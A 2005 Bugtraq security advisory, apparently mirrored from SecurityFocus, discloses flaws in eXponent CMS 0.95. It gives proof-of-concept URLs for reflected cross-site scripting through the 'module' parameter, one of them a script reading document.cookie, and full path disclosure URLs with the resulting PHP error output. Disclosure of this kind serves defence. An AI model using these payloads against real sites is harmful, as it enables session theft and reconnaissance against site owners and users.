Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs
BugTraq
Vulnerabilities in eXponent 0.95 Jan 25 2005 08:35AM
Ahmad Muammar (y3dips echo or id)


ECHO_ADV_02$2004

------------------------------------------------------------------------
---

Vulnerabilities in eXponent

------------------------------------------------------------------------
---

Author: y3dips

Date: Januari, 25th 2005

Location: Indonesia, Jakarta

Web: http://echo.or.id/adv/adv010-y3dips-2005.txt

------------------------------------------------------------------------
---

Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Exponent Content Management System

Exponent is an exciting new web-based content management system. It makes

creating and maintaining websites easy for non-technical users, while

providing site managers the power and flexibility to add new features,

completely customize the layout, and delegate responsibilities to other

users.

by: James Hunt and the OIC Group

http://www.exponentcms.org

Version :

- Stable version of 0.95 Exponent CMS.

------------------------------------------------------------------------
---

Vulnerabilities:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A. Cross-site scripting aka XSS:

A1 - XSS through unsanitaized user submitted in module variable

http://[SITE]/expo/index.php?action=view&id=2&module=<h1>Tes</h1>

POC : http://[SITE]/expo/index.php?action=view&id=2&module=<h1>Tes</h1>

A2. Session ID at module Variable

http://[SITE]/endon/mod.php?action=[BLABLA]&module=[XSS]

POC :

http://[SITE]/expo/index.php?action=createuser&module=%3Cscript%3Ealert(
document.cookie)%3C/script%3E

B. Full Path disclosures

Some scripts in subsystems directories are vulnerable against direct access

and we will see standard php error messages revealing full path to script

This vulnerable is because undeffined pathos_core_version variable ,

and the vulnerable files has the same format name (:)~)

---.info.---.php

POC : http://localhost/expo/subsystems/search.info.php

Fatal error: Call to undefined function: pathos_core_version() in

/var/www/html/expo/subsystems/search.info.php on line 52

POC :

http://localhost/expo/subsystems/permissions.info.php

POC :

http://localhost/expo/subsystems/security.info.php

Fatal error: Call to undefined function: pathos_core_version() in

/var/www/html/expo/subsystems/security.info.php on line 51

Fatal error: Call to undefined function: pathos_core_version() in

/var/www/html/expo/subsystems/permissions.info.php on line 51

Another vulnerable path

- http://localhost/expo/sdk/blanks/formcontrol.php

- http://localhost/expo/sdk/blanks/file_modules.php

------------------------------------------------------------------------
---

Shoutz:

~~~~~~~

~ echo|staff (m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32)

~ newbie_hacker (at) yahoogroups (dot) com [email concealed] ,

~ #e-c-h-o@DALNET

------------------------------------------------------------------------
---

Contact:

~~~~~~~~

y3dips || echo|staff || y3dips[at]gmail[dot]com

Homepage: http://y3dips.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------

[ reply ]




 

Privacy Statement
Copyright 2009, SecurityFocus